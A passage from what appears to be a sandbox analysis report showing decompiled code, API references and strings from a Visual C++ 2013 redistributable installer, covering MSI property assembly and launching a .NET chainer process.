															_t207 = _t201 - 1;
															__eflags = _t207;
															if(_t207 == 0) {
																_t260 = E012B1325(_t263,  &_v1588, L" ACTION=ADMIN", 0);
																__eflags = _t260;
																if(_t260 >= 0) {
																	goto L42;
																}
																_push("Failed to add ADMIN property on admin install.");
																goto L76;
															}
															_t210 = _t207 - 1;
															__eflags = _t210;
															if(_t210 == 0) {
																L51:
																__eflags = _t263 - 4;
																if(_t263 == 4) {
																	L53:
																	_t278 = 0x12ba5c8;
																	L54:
																	__eflags = _t263 - 4;
																	_t268 = "o";
																	if(_t263 != 4) {
																		_t268 = "e";
																	}
																	_t211 = _v1588;
																	__eflags = _t211;
																	if(_t211 == 0) {
																		_t211 = 0x12ba5c8;
																	}
																	_push(_t268);
																	_push(_t278);
																	_t260 = E012B177A( &_v1588, L"%ls%ls REINSTALLMODE=\"cmus%ls\" REBOOT=ReallySuppress", _t211);
																	__eflags = _t260;
																	if(_t260 >= 0) {
																		_push(L"IGNOREDEPENDENCIES");
																		_t260 = E012B177A( &_v1588, L"%ls %ls=ALL", _v1588);
																		__eflags = _t260;
																		if(__eflags >= 0) {
																			_t260 = E012B461A(__eflags, _v1592, _v1588,  &_v1600);
																			__eflags = _t260;
																			if(_t260 >= 0) {
																				goto L77;
																			}
																			_push("Failed to run maintanance mode for MSI package.");
																			goto L76;
																		}
																		L61:
																		_push("Failed to add the list of dependencies to ignore to the properties.");
																	} else {
																		_push("Failed to add reinstall mode and reboot suppression properties on repair.");
																	}
																	goto L76;
																}
																_t218 =  *((intOrPtr*)(_t280 + 8));
																_t278 = L" REINSTALL=ALL";
																__eflags =  *(_t218 + 0xc0);
																if( *(_t218 + 0xc0) == 0) {
																	goto L54;
																}
																goto L53;
															}
															_t219 = _t210 - 1;
															__eflags = _t219;
															if(_t219 == 0) {
																goto L51;
															}
															_t220 = _t219 - 1;
															__eflags = _t220;
															if(_t220 == 0) {
																_t221 =  *((intOrPtr*)(_t280 + 8));
																__eflags =  *(_t221 + 0xc0);
																if( *(_t221 + 0xc0) != 0) {
																	L47:
																	_t260 = E012B1325(_t263,  &_v1588, L" REINSTALLMODE=\"vomus\" REBOOT=ReallySuppress", 0);
																	__eflags = _t260;
																	if(__eflags >= 0) {
																		_t260 = E012B461A(__eflags, _v1592, _v1588,  &_v1600);
																		__eflags = _t260;
																		if(_t260 >= 0) {
																			goto L68;
																		}
																		_push("Failed to perform minor upgrade of MSI package.");
																		goto L76;
																	}
																	_push("Failed to add reinstall mode and reboot suppression properties on minor upgrade.");
																	goto L76;
																}
																_t260 = E012B1325(_t263,  &_v1588, L" REINSTALL=ALL", 0);
																__eflags = _t260;
																if(_t260 >= 0) {
																	goto L47;
																}
																_push("Failed to add reinstall all property on minor upgrade.");
																goto L76;
															}
															__eflags = _t220 != 1;
															if(_t220 != 1) {
																goto L77;
															}
															goto L42;
														}
													}
													_push("Failed to add patch properties to obfuscated argument string.");
													goto L76;
												}
												_push("Failed to add patch properties to argument string.");
												goto L76;
											}
											_push("Failed to add feature action properties to obfuscated argument string.");
											goto L76;
										}
										_push("Failed to add feature action properties to argument string.");
										goto L76;
									}
									_push("Failed to add obfuscated properties to argument string.");
									goto L76;
								}
								_push("Failed to add properties to argument string.");
								goto L76;
							}
							__eflags =  *_t155;
							if( *_t155 == 0) {
								goto L21;
							}
							_t260 = E012B41A2(_v1624, _t155, 0);
							__eflags = _t260;
							if(_t260 >= 0) {
								goto L21;
							}
							_push( *(_t280 + 0xc));
							E012AFA86(_t260, "Failed to enable logging for package: %ls to: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)))));
							goto L77;
						}
						_push("Failed to initialize external UI handler.");
						goto L76;
					} else {
						_t260 = E0129743F( &_v1612, 0,  *( *((intOrPtr*)(_t280 + 8)) + 0x14),  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0x24)),  &_v1612);
						__eflags = _t260;
						if(_t260 >= 0) {
							_t260 = E012B201F( &_v1612, _t278, _v1612,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0x7c)))) + 0x18)),  &_v1592);
							__eflags = _t260;
							if(_t260 >= 0) {
								goto L15;
							}
							_push("Failed to build MSI path.");
							L76:
							_push(_t260);
							E012AFA86();
							L77:
							E012B41E9( &_v1584);
							if(_v1588 != 0) {
								E012B01E8(_v1588);
							}
							if(_v1596 != 0) {
								E012B01E8(_v1596);
							}
							if(_v1592 != 0) {
								E012B01E8(_v1592);
							}
							if(_v1612 != 0) {
								E012B01E8(_v1612);
							}
							if(_v1604 != 0) {
								E012B01E8(_v1604);
							}
							_t183 = _v1600;
							if(_t183 == 0) {
								 *_v1616 = 0;
							} else {
								_t187 = _t183 - 1;
								if(_t187 == 0) {
									 *_v1616 = 1;
								} else {
									if(_t187 == 1) {
										 *_v1616 = 2;
									}
								}
							}
							return E012A7EAA(_t260, _t260, _v8 ^ _t281, _t278, 0, _t280);
						}
						E012AFA86(_t260, "Failed to get cached path for package: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)))));
						goto L77;
					}
				}
				_t241 =  *((intOrPtr*)(_t280 + 0x18));
				if(_t241 != 1) {
					__eflags = _t241 - 2;
					if(_t241 != 2) {
						goto L8;
					}
					__eflags =  *( *((intOrPtr*)(_t280 + 8)) + 0x14);
					_t243 = E012B4461((0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + (0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + 2,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0x90)), 0, (0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + (0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + 2, L"VersionString",  &_v1604);
					__eflags = _t243;
					if(_t243 < 0) {
						goto L8;
					}
					_push(4);
					L7:
					E012918A7();
					_push(E012917CA( *((intOrPtr*)(_t280 + 0x18))));
					E01281566(2, 0x2000013e,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)))));
					_t260 = 0;
					goto L77;
				}
				if(E012B4461((0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + (0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + 2,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0x90)), 0, (0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + (0 |  *( *((intOrPtr*)(_t280 + 8)) + 0x14) != 0x00000000) + 2, L"VersionString",  &_v1604) >= 0) {
					goto L8;
				} else {
					_push(2);
					goto L7;
				}
			}

0x0129cc4f
0x0129cc58
0x0129cc5f
0x0129cc65
0x0129cc6e
0x0129cc78
0x0129cc7c
0x0129cc7f
0x0129cc89
0x0129cc97
0x0129cca7
0x0129ccad
0x0129ccb5
0x0129ccbb
0x0129ccc1
0x0129ccc7
0x0129cccd
0x0129ccd3
0x0129ccdb
0x0129cd76
0x0129cd76
0x0129cd7a
0x0129cd84
0x0129cd86
0x0129cd86
0x0129cd90
0x0129cd94
0x0129cdf6
0x0129ce18
0x0129ce1f
0x0129ce21
0x0129ce2d
0x0129ce30
0x0129ce32
0x0129ce67
0x0129ce8a
0x0129ce91
0x0129ce93
0x0129cec3
0x0129cec8
0x0129ceca
0x0129cecc
0x0129cee5
0x0129ceea
0x0129ceec
0x0129ceee
0x0129cf07
0x0129cf0e
0x0129cf10
0x0129cf29
0x0129cf30
0x0129cf32
0x0129cf4b
0x0129cf52
0x0129cf54
0x0129cf60
0x0129cf66
0x0129cf68
0x0129cf6a
0x0129cf6a
0x0129cf6f
0x0129cf70
0x0129cf7e
0x0129cf82
0x0129cf97
0x0129cf9c
0x0129cfa4
0x0129cfa4
0x0129cfa5
0x0129d19b
0x0129d19d
0x0129d19f
0x0129d1a8
0x0129d1c4
0x0129d1c9
0x0129d1cb
0x00000000
0x00000000
0x0129d1ef
0x0129d1f1
0x0129d1f7
0x0129d205
0x0129d20d
0x0129d20d
0x0129d20d
0x0129d20f
0x0129d211
0x00000000
0x0129d213
0x0129d213
0x00000000
0x0129d213
0x0129d211
0x0129d1a1
0x00000000
0x0129cfab
0x0129cfab
0x0129cfab
0x0129cfac
0x0129cfcd
0x0129cfdf
0x0129cfe1
0x0129cfe3
0x0129d166
0x0129d168
0x0129d16a
0x0129d176
0x0129d17f
0x00000000
0x0129d17f
0x0129d16c
0x00000000
0x0129d16c
0x0129cfe9
0x00000000
0x0129cfe9
0x0129cfae
0x0129cfae
0x0129cfaf
0x0129d13a
0x0129d13c
0x0129d13e
0x00000000
0x00000000
0x0129d144
0x00000000
0x0129d144
0x0129cfb5
0x0129cfb5
0x0129cfb6
0x0129d06e
0x0129d06e
0x0129d071
0x0129d083
0x0129d083
0x0129d088
0x0129d088
0x0129d08b
0x0129d090
0x0129d092
0x0129d092
0x0129d097
0x0129d09d
0x0129d09f
0x0129d0a1
0x0129d0a1
0x0129d0a6
0x0129d0a7
0x0129d0ba
0x0129d0bf
0x0129d0c1
0x0129d0cd
0x0129d0e9
0x0129d0ee
0x0129d0f0
0x0129d114
0x0129d116
0x0129d118
0x00000000
0x00000000
0x0129d11e
0x00000000
0x0129d11e
0x0129d0f2
0x0129d0f2
0x0129d0c3
0x0129d0c3
0x0129d0c3
0x00000000
0x0129d0c1
0x0129d073
0x0129d076
0x0129d07b
0x0129d081
0x00000000
0x00000000
0x00000000
0x0129d081
0x0129cfbc
0x0129cfbc
0x0129cfbd
0x00000000
0x00000000
0x0129cfc3
0x0129cfc3
0x0129cfc4
0x0129cff3
0x0129cff6
0x0129cffc
0x0129d020
0x0129d032
0x0129d034
0x0129d036
0x0129d05a
0x0129d05c
0x0129d05e
0x00000000
0x00000000
0x0129d064
0x00000000
0x0129d064
0x0129d038
0x00000000
0x0129d038
0x0129d010
0x0129d012
0x0129d014
0x00000000
0x00000000
0x0129d016
0x00000000
0x0129d016
0x0129cfc6
0x0129cfc7
0x00000000
0x00000000
0x00000000
0x0129cfc7
0x0129cfa5
0x0129cf56
0x00000000
0x0129cf56
0x0129cf34
0x00000000
0x0129cf34
0x0129cf12
0x00000000
0x0129cf12
0x0129cef0
0x00000000
0x0129cef0
0x0129cece
0x00000000
0x0129cece
0x0129ce95
0x00000000
0x0129ce95
0x0129ce34
0x0129ce37
0x00000000
0x00000000
0x0129ce46
0x0129ce48
0x0129ce4a
0x00000000
0x00000000
0x0129ce4c
0x0129ce5a
0x00000000
0x0129ce5f
0x0129ce23
0x00000000
0x0129cd96
0x0129cdab
0x0129cdad
0x0129cdaf
0x0129cde6
0x0129cde8
0x0129cdea
0x00000000
0x00000000
0x0129cdec
0x0129d218
0x0129d218
0x0129d219
0x0129d220
0x0129d227
0x0129d232
0x0129d23a
0x0129d23a
0x0129d245
0x0129d24d
0x0129d24d
0x0129d258
0x0129d260
0x0129d260
0x0129d26b
0x0129d273
0x0129d273
0x0129d27e
0x0129d286
0x0129d286
0x0129d291
0x0129d293
0x0129d2bd
0x0129d295
0x0129d295
0x0129d296
0x0129d2af
0x0129d298
0x0129d299
0x0129d2a1
0x0129d2a1
0x0129d299
0x0129d296
0x0129d2cf
0x0129d2cf
0x0129cdbc
0x00000000
0x0129cdc1
0x0129cd94
0x0129cce1
0x0129cce7
0x0129cd19
0x0129cd1c
0x00000000
0x00000000
0x0129cd2a
0x0129cd41
0x0129cd46
0x0129cd48
0x00000000
0x00000000
0x0129cd4a
0x0129cd4c
0x0129cd4c
0x0129cd5a
0x0129cd67
0x0129cd6f
0x00000000
0x0129cd6f
0x0129cd13
0x00000000
0x0129cd15
0x0129cd15
0x00000000
0x0129cd15

APIs

_memset.LIBCMT ref: 0129CCAD

Part of subcall function 012B4CFE: _memset.LIBCMT ref: 012B4D0F

Strings

REINSTALL=ALL, xrefs: 0129CFFF, 0129D076
VersionString, xrefs: 0129CCF8, 0129CD2D
Failed to install MSI package., xrefs: 0129D16C
%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 0129D0AF
REBOOT=ReallySuppress, xrefs: 0129CFCE, 0129D18A
Failed to build MSI path., xrefs: 0129CDEC
Failed to uninstall MSI package., xrefs: 0129D213
Failed to add the list of dependencies to ignore to the properties., xrefs: 0129D0F2
%ls %ls=ALL, xrefs: 0129D0DE, 0129D1B9
Failed to add reinstall all property on minor upgrade., xrefs: 0129D016
Failed to add feature action properties to argument string., xrefs: 0129CEF0
ACTION=ADMIN, xrefs: 0129D129
Failed to add patch properties to argument string., xrefs: 0129CF34
Failed to add feature action properties to obfuscated argument string., xrefs: 0129CF12
Failed to run maintanance mode for MSI package., xrefs: 0129D11E
Failed to add obfuscated properties to argument string., xrefs: 0129CECE
REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 0129D021
Failed to get cached path for package: %ls, xrefs: 0129CDB6
Failed to perform minor upgrade of MSI package., xrefs: 0129D064
Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0129D038
Failed to initialize external UI handler., xrefs: 0129CE23
Failed to add reboot suppression property on install., xrefs: 0129CFE9
Failed to add patch properties to obfuscated argument string., xrefs: 0129CF56
Failed to add reboot suppression property on uninstall., xrefs: 0129D1A1
Failed to enable logging for package: %ls to: %ls, xrefs: 0129CE54
Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0129D0C3
Failed to add ADMIN property on admin install., xrefs: 0129D144
IGNOREDEPENDENCIES, xrefs: 0129D0CD, 0129D1A8
Failed to add properties to argument string., xrefs: 0129CE95

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString
API String ID: 2102423945-2112609193
Opcode ID: 8e255fac53795e40db7039b9740c60e2dce43ea11226188f118533f677a247a0
Instruction ID: 4510fff9d81d9b963f1e7662516a4611219f694e5d657b8703a1f0473ac642a8
Opcode Fuzzy Hash: 8e255fac53795e40db7039b9740c60e2dce43ea11226188f118533f677a247a0
Instruction Fuzzy Hash: 7002DC71A7061AAFDF21AF98CCC1EB9B7B6FF94710F0041D9E20993111D6729AA1DF50

Uniqueness

Uniqueness Score: -1.00%

Function 012A4D0B Relevance: 51.0, APIs: 13, Strings: 16, Instructions: 294
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E012A4D0B(void* __edx, WCHAR* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, DWORD* _a20) {
				signed int _v8;
				char _v88;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				struct _SECURITY_ATTRIBUTES* _v120;
				signed int _v124;
				WCHAR* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				struct _PROCESS_INFORMATION _v152;
				intOrPtr _v156;
				void* _v160;
				DWORD* _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _v180;
				struct _STARTUPINFOW _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				signed int _t92;
				signed int _t94;
				signed int _t97;
				signed int _t107;
				signed int _t111;
				signed int _t112;
				intOrPtr _t127;
				DWORD* _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				signed int _t148;
				void* _t149;
				signed int _t154;
				void* _t155;
				long _t162;
				struct _SECURITY_ATTRIBUTES* _t164;
				void* _t165;
				signed int _t166;

				_t155 = __edx;
				_t81 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t81 ^ _t166;
				_v128 = _a4;
				_v124 = _a8;
				_v132 = _a12;
				_v136 = _a16;
				_v164 = _a20;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t164 = 0;
				asm("stosd");
				_v116 = 0;
				_v108 = 0;
				_v120 = 0;
				_v112 = 0;
				E012A7E30( &_v248, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t92 =  &_v104;
				__imp__UuidCreate(_t92);
				if((_t92 | 0x00000001) >= 0) {
					_t94 =  &_v104;
					__imp__StringFromGUID2(_t94,  &_v88, 0x27);
					__eflags = _t94;
					if(_t94 != 0) {
						_t97 = E012B177A( &_v108, L"NetFxSection.%ls",  &_v88);
						__eflags = _t97;
						if(_t97 >= 0) {
							__eflags = E012B177A( &_v116, L"NetFxEvent.%ls",  &_v88);
							if(__eflags >= 0) {
								_t148 = E012A4A40(_t149, __eflags, _v108, _v116,  &_v112);
								__eflags = _t148;
								if(_t148 >= 0) {
									_push(_v108);
									_t148 = E012B177A( &_v120, L"%ls /pipe %ls", _v124);
									__eflags = _t148;
									if(_t148 >= 0) {
										_v248.cb = 0x44;
										_t107 = CreateProcessW(_v128, _v120, 0, 0, 0, 0x8000000, 0, 0,  &_v248,  &_v152);
										__eflags = _t107;
										if(_t107 != 0) {
											_t164 = _v112;
											_v160 = _v152.hProcess;
											_push(0x64);
											_push(0);
											_v156 =  *((intOrPtr*)(_t164 + 4));
											while(1) {
												_t111 = WaitForMultipleObjects(2,  &_v160, ??, ??);
												__eflags = _t111;
												if(_t111 == 0) {
													break;
												}
												__eflags = _t111 - 1;
												if(_t111 != 1) {
													__eflags = _t111 - 0xffffffff;
													if(_t111 == 0xffffffff) {
														_t112 = GetLastError();
														__eflags = _t112;
														if(_t112 > 0) {
															_t112 = _t112 & 0x0000ffff | 0x80070000;
															__eflags = _t112;
														}
														_t148 = _t112;
														__eflags = _t148;
														if(_t148 >= 0) {
															_t148 = 0x80004005;
														}
														E012B294E(_t112, "NetFxChainer.cpp", 0x1a8, _t148);
														_push("Failed to wait for netfx chainer process to complete");
														goto L45;
													} else {
														goto L24;
													}
												} else {
													_t148 = E012A493F(_t164, _t155, _v132, _v136);
													__eflags = _t148;
													if(_t148 >= 0) {
														L24:
														_push(0x64);
														_push(0);
														continue;
													} else {
														_push("Failed to process netfx chainer message.");
														goto L45;
													}
												}
												goto L47;
											}
											WaitForSingleObject( *(_t164 + 0xc), 0xffffffff);
											_t127 =  *((intOrPtr*)(_t164 + 0x10));
											__eflags =  *(_t127 + 4);
											_t162 =  *(_t127 + 8);
											if( *(_t127 + 4) < 0) {
												__eflags = _t162;
												if(_t162 == 0) {
													L29:
													_t162 =  *(_t127 + 4);
												} else {
													__eflags = _t162 - 0x80004004;
													if(_t162 == 0x80004004) {
														goto L29;
													}
												}
											}
											_v124 =  *((intOrPtr*)(_t127 + 0xc));
											ReleaseMutex( *(_t164 + 0xc));
											_t130 = _v164;
											 *_t130 = _t162;
											__eflags = _t162 - 0x8000000a;
											if(_t162 != 0x8000000a) {
												_t154 = _v124;
												__eflags = _t154;
												if(_t154 < 0) {
													asm("stosd");
													asm("stosd");
													asm("stosd");
													asm("stosd");
													_v176 = _v176 & 0x00000000;
													_v168 = _v168 & 0x00000000;
													_v180 = 1;
													_v172 = _t154;
													_v132( &_v180, _v136);
													__eflags = _t148;
													if(_t148 < 0) {
														_push("Failed to send internal error message from netfx chainer.");
														goto L45;
													}
												}
											} else {
												_t134 = GetExitCodeProcess(_v152.hProcess, _t130);
												__eflags = _t134;
												if(_t134 == 0) {
													_t135 = GetLastError();
													__eflags = _t135;
													if(_t135 > 0) {
														_t135 = _t135 & 0x0000ffff | 0x80070000;
														__eflags = _t135;
													}
													_t148 = _t135;
													__eflags = _t148;
													if(_t148 >= 0) {
														_t148 = 0x80004005;
													}
													E012B294E(_t135, "NetFxChainer.cpp", 0x194, _t148);
													_push("Failed to get netfx return code.");
													goto L45;
												}
											}
										} else {
											_t138 = GetLastError();
											__eflags = _t138;
											if(_t138 > 0) {
												_t138 = _t138 & 0x0000ffff | 0x80070000;
												__eflags = _t138;
											}
											_t148 = _t138;
											__eflags = _t148;
											if(_t148 >= 0) {
												_t148 = 0x80004005;
											}
											E012B294E(_t138, "NetFxChainer.cpp", 0x184, _t148);
											E012AFA86(_t148, "Failed to CreateProcess on path: %ls", _v128);
											_t164 = _v112;
										}
									} else {
										_push("Failed to allocate netfx chainer arguments.");
										goto L10;
									}
								} else {
									_push("Failed to create netfx chainer.");
									L10:
									_push(_t148);
									E012AFA86();
									_t164 = _v112;
									goto L46;
								}
							} else {
								_push("Failed to allocate event name.");
								goto L45;
							}
						} else {
							_push("Failed to allocate section name.");
							goto L45;
						}
					} else {
						_t148 = 0x8007000e;
						E012B294E(_t94, "NetFxChainer.cpp", 0x172, 0x8007000e);
						_push("Failed to convert netfx chainer guid into string.");
						goto L45;
					}
				} else {
					_push("Failed to create netfx chainer guid.");
					L45:
					_push(_t148);
					E012AFA86();
					L46:
				}
				L47:
				if(_v108 != 0) {
					E012B01E8(_v108);
				}
				if(_v116 != 0) {
					E012B01E8(_v116);
				}
				if(_v120 != 0) {
					E012B01E8(_v120);
				}
				E012A4762(0, _t164);
				_t165 = CloseHandle;
				if(_v152.hThread != 0) {
					CloseHandle(_v152.hThread);
					_v152.hThread = 0;
				}
				if(_v152.hProcess != 0) {
					CloseHandle(_v152);
				}
				return E012A7EAA(_t148, _t148, _v8 ^ _t166, _t155, 0, _t165);
			}

0x012a4d0b
0x012a4d14
0x012a4d1b
0x012a4d21
0x012a4d27
0x012a4d2d
0x012a4d33
0x012a4d3f
0x012a4d4a
0x012a4d4b
0x012a4d4c
0x012a4d4d
0x012a4d51
0x012a4d5a
0x012a4d5d
0x012a4d60
0x012a4d63
0x012a4d66
0x012a4d73
0x012a4d74
0x012a4d75
0x012a4d76
0x012a4d7a
0x012a4d7e
0x012a4d89
0x012a4d9b
0x012a4d9f
0x012a4da5
0x012a4da7
0x012a4dd5
0x012a4de1
0x012a4de3
0x012a4e06
0x012a4e08
0x012a4e23
0x012a4e25
0x012a4e27
0x012a4e3c
0x012a4e50
0x012a4e55
0x012a4e57
0x012a4e7b
0x012a4e88
0x012a4e8e
0x012a4e90
0x012a4ee0
0x012a4ee3
0x012a4eec
0x012a4eee
0x012a4ef5
0x012a4f2f
0x012a4f38
0x012a4f3a
0x012a4f3c
0x00000000
0x00000000
0x012a4efd
0x012a4f00
0x012a4f22
0x012a4f25
0x012a5021
0x012a5027
0x012a5029
0x012a5030
0x012a5030
0x012a5030
0x012a5035
0x012a5037
0x012a5039
0x012a503b
0x012a503b
0x012a504b
0x012a5050
0x00000000
0x00000000
0x00000000
0x00000000
0x012a4f02
0x012a4f12
0x012a4f14
0x012a4f16
0x012a4f2b
0x012a4f2b
0x012a4f2d
0x00000000
0x012a4f18
0x012a4f18
0x00000000
0x012a4f18
0x012a4f16
0x00000000
0x012a4f00
0x012a4f43
0x012a4f49
0x012a4f4c
0x012a4f50
0x012a4f53
0x012a4f55
0x012a4f57
0x012a4f61
0x012a4f61
0x012a4f59
0x012a4f59
0x012a4f5f
0x00000000
0x00000000
0x012a4f5f
0x012a4f57
0x012a4f6a
0x012a4f6d
0x012a4f73
0x012a4f79
0x012a4f7b
0x012a4f81
0x012a4fd1
0x012a4fd4
0x012a4fd6
0x012a4fea
0x012a4feb
0x012a4fec
0x012a4fed
0x012a4fee
0x012a4ff5
0x012a5003
0x012a500d
0x012a5013
0x012a5016
0x012a5018
0x012a501a
0x00000000
0x012a501a
0x012a5018
0x012a4f83
0x012a4f8a
0x012a4f90
0x012a4f92
0x012a4f98
0x012a4f9e
0x012a4fa0
0x012a4fa7
0x012a4fa7
0x012a4fa7
0x012a4fac
0x012a4fae
0x012a4fb0
0x012a4fb2
0x012a4fb2
0x012a4fc2
0x012a4fc7
0x00000000
0x012a4fc7
0x012a4f92
0x012a4e92
0x012a4e92
0x012a4e98
0x012a4e9a
0x012a4ea1
0x012a4ea1
0x012a4ea1
0x012a4ea6
0x012a4ea8
0x012a4eaa
0x012a4eac
0x012a4eac
0x012a4ebc
0x012a4eca
0x012a4ecf
0x012a4ed2
0x012a4e59
0x012a4e59
0x00000000
0x012a4e59
0x012a4e29
0x012a4e29
0x012a4e2e
0x012a4e2e
0x012a4e2f
0x012a4e34
0x00000000
0x012a4e34
0x012a4e0a
0x012a4e0a
0x00000000
0x012a4e0a
0x012a4de5
0x012a4de5
0x00000000
0x012a4de5
0x012a4da9
0x012a4da9
0x012a4db9
0x012a4dbe
0x00000000
0x012a4dbe
0x012a4d8b
0x012a4d8b
0x012a5055
0x012a5055
0x012a5056
0x012a505b
0x012a505c
0x012a505d
0x012a5062
0x012a5067
0x012a5067
0x012a506f
0x012a5074
0x012a5074
0x012a507c
0x012a5081
0x012a5081
0x012a5086
0x012a508b
0x012a5099
0x012a50a1
0x012a50a3
0x012a50a3
0x012a50af
0x012a50b7
0x012a50b7
0x012a50c9

APIs

_memset.LIBCMT ref: 012A4D66
UuidCreate.RPCRT4(?), ref: 012A4D7E
StringFromGUID2.OLE32(?,?,00000027), ref: 012A4D9F
CloseHandle.KERNEL32(?,NetFxChainer.cpp,000001A8,00000000,?,?,?,?), ref: 012A50A1
CloseHandle.KERNEL32(?,NetFxChainer.cpp,000001A8,00000000,?,?,?,?), ref: 012A50B7

Strings

NetFxEvent.%ls, xrefs: 012A4DF6
Failed to send internal error message from netfx chainer., xrefs: 012A501A
Failed to create netfx chainer., xrefs: 012A4E29
Failed to allocate section name., xrefs: 012A4DE5
Failed to create netfx chainer guid., xrefs: 012A4D8B
%ls /pipe %ls, xrefs: 012A4E45
Failed to allocate netfx chainer arguments., xrefs: 012A4E59
Failed to process netfx chainer message., xrefs: 012A4F18
NetFxChainer.cpp, xrefs: 012A4DB4, 012A4EB7, 012A4FBD, 012A5046
Failed to convert netfx chainer guid into string., xrefs: 012A4DBE
D, xrefs: 012A4E7B
NetFxSection.%ls, xrefs: 012A4DCF
Failed to get netfx return code., xrefs: 012A4FC7
Failed to CreateProcess on path: %ls, xrefs: 012A4EC4
Failed to allocate event name., xrefs: 012A4E0A
Failed to wait for netfx chainer process to complete, xrefs: 012A5050

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$CreateFromStringUuid_memset
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to send internal error message from netfx chainer.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 2223292257-4284037740
Opcode ID: 39dcc5b607463f5b589bf031bc4e8159e73d9989504ea41d4c3beaef280becc6
Instruction ID: 04ec9aec292edd93b7c146acd0339b62c010277dc67985a9b3964f87ccf7acc3
Opcode Fuzzy Hash: 39dcc5b607463f5b589bf031bc4e8159e73d9989504ea41d4c3beaef280becc6
Instruction Fuzzy Hash: 57A1F471A6030AAFEF219FA4CD85FAEBBB9AF08700F544169E708F7101D7B199058F90

Uniqueness

Uniqueness Score: -1.00%

Function 0128799F Relevance: 44.1, APIs: 8, Strings: 17, Instructions: 313
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0128799F(void* __ebx, void* __edx, intOrPtr _a4) {
				int _v8;
				WCHAR* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				long _v32;
				intOrPtr _v40;
				WCHAR* _v48;
				signed int _t80;
				signed int _t85;
				char* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t94;
				signed int _t108;
				long _t111;
				long _t114;
				signed int _t115;
				signed int _t118;
				intOrPtr* _t123;
				void* _t137;
				void* _t145;
				void* _t148;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed int _t156;
				void* _t157;

				_t145 = __edx;
				_t137 = __ebx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
